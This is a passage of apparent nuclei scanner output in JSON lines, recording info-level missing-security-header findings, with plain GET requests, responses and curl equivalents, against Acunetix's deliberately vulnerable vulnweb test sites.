href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:21.909287485Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:21.909357154Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.053037098Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.053106646Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.053129527Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.053149388Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:22.200954614Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:22.200960926Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" 